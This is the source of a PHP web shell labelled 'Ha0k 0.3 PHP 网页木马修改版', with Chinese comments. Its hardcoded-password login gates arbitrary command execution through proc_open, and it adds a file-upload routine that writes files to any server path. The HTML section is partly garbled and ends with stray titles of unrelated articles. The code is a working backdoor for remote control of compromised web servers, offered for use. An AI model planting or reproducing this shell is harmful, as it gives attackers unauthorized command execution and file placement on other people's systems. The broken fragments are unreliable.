<?php+echo+木马,Ha0k 0.3 PHP 网页木马修改版

//此处可设置多个用户

$passwd = array('ha0k' => 'ha0k',

'hackerdsb'=>'hackerdsb');

/* 此处设置命令的别名 */

$aliases = array('ls' => 'ipconfig',

'll' => 'ls -lvhF');

if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])||

!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||

$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {

header('WWW-Authenticate: Basic realm="by Ha0k"');

header('HTTP/1.0 401 Unauthorized');

$authenticated = false;

}

else {

$authenticated = true;

/* 开始session */

session_start();

/* 初始化session. */

if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {

$_SESSION['cwd'] = getcwd(); //取当前目录

$_SESSION['history'] = array();

$_SESSION['output'] = '';

}

if (!empty($_REQUEST['command'])) {

if (get_magic_quotes_gpc()) { //0表关闭，1表开启，开启时过滤

/* We don't want to add the commands to the history in the

* escaped form, so we remove the backslashes now. */

$_REQUEST['command'] = stripslashes($_REQUEST['command']); //将用addslashes()函数处理后的字符串返回原样

}

/* history */

if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) //查找保存数组中的值

unset($_SESSION['history'][$i]); //销毁

array_unshift($_SESSION['history'], $_REQUEST['command']);//array_unshift()函数的作用是在一个数组中插入新的元素。而这个新的数组将被添加到原数组的开头部分。函数最终返回的是插入新元素后的数组。

/* 输出Ha0k# command */

$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['command'] . "\n";

/* Initialize the current working directory. */

if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {

$_SESSION['cwd'] = dirname(__FILE__); //获取当前所在目录

} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {

/* The current command is a 'cd' command which we have to handle

* as an internal shell command. */

if ($regs[1][0] == '/') {

/* Absolute path, we use it unchanged. */

$new_dir = $regs[1];

} else {

/* Relative path, we append it to the current working

* directory. */

$new_dir = $_SESSION['cwd'] . '/' . $regs[1];

}

/* Transform '/./' into '/' */

while (strpos($new_dir, '/./') !== false)

$new_dir = str_replace('/./', '/', $new_dir);

/* Transform '//' into '/' */

while (strpos($new_dir, '//') !== false)

$new_dir = str_replace('//', '/', $new_dir);

/* Transform 'x/..' into '' */

while (preg_match('|/\.\.(?!\.)|', $new_dir))

$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

if ($new_dir == '') $new_dir = '/';

/* Try to change directory. */

if (@chdir($new_dir)) { //改变当前目录

$_SESSION['cwd'] = $new_dir;

} else {

$_SESSION['output'] .= "cd: could not change to: $new_dir\n";

}

} else {

/* The command is not a 'cd' command, so we execute it after

* changing the directory and save the output. */

chdir($_SESSION['cwd']); //改变目录

/* 别名扩展 */

$length = strcspn($_REQUEST['command'], " \t"); //查找\t字符串，返回位置

$token = substr($_REQUEST['command'], 0, $length); //取字符串0-\t

if (isset($aliases[$token]))

$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);

$p = proc_open($_REQUEST['command'], //执行脚本

array(1 => array('pipe', 'w'),

2 => array('pipe', 'w')),

$io);

/* 读出发送 */

while (!feof($io[1])) {

$_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //转换特殊字符为HTML字符编码

ENT_COMPAT, 'GB2312');

}

/* 读出 */

while (!feof($io[2])) {

$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),

ENT_COMPAT, 'GB2312');

}

fclose($io[1]);

fclose($io[2]);

proc_close($p);//关闭管道

}

}

/* 构建在JavaScript使用命令历史记录 */

if (empty($_SESSION['history'])) {

$js_command_hist = '""';

} else {

$escaped = array_map('addslashes', $_SESSION['history']);

$js_command_hist = '"", "' . implode('", "', $escaped) . '"';//将数组搞成字符串

}

}

header('Content-Type: text/html; charset=GB2312');

echo '<?xml version="1.0" encoding="GB2312"?>' . "\n";

?>

if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {

copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);

//echo "上传文件成功: " . $HTTP_POST_FILES['userfile']['name'];

}

?>

/p>

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

Ha0k webshell

var current_line = 0;

var command_hist = new Array(<?php echo $js_command_hist ?>);

var last = 0;

function key(e) {

if (!e) var e = window.event;

if (e.keyCode == 38 && current_line < command_hist.length-1) {

command_hist[current_line] = document.shell.command.value;

current_line++;

document.shell.command.value = command_hist[current_line];

}

if (e.keyCode == 40 && current_line > 0) {

command_hist[current_line] = document.shell.command.value;

current_line--;

document.shell.command.value = command_hist[current_line];

}

}

function init() {

document.shell.setAttribute("autocomplete", "off");

document.shell.output.scrollTop = document.shell.output.scrollHeight;

document.shell.command.focus();

}

HA0K

WE JUST FOR JUSTICE，FIGHT FOR EVIAL

You failed to authenticate yourself to PhpShell. You can

href="<?php echo $_SERVER['PHP_SELF'] ?>">reload

to try again.

Try reading the INSTALL file if you're having

problems with installing PhpShell.

exit;

}

error_reporting (E_ALL);

if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;

?>

当前目录为: <?php echo $_SESSION['cwd'] ?>

$lines = substr_count($_SESSION['output'], "\n");

$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));

echo rtrim($padding . $_SESSION['output']);

?>

<

$ 

οnkeyup="key(event)" size="78" tabindex="1">

行数:

本地文件名:

远程文件名:

Mcafee(麦咖啡杀毒软件) 防止网页被挂马的设置教程(最后不要在服务器端打开) 我们强烈推荐服务器安装mcafee 8.5i的版本

全世界最小的php网页木马一枚 附PHP木马的防范方法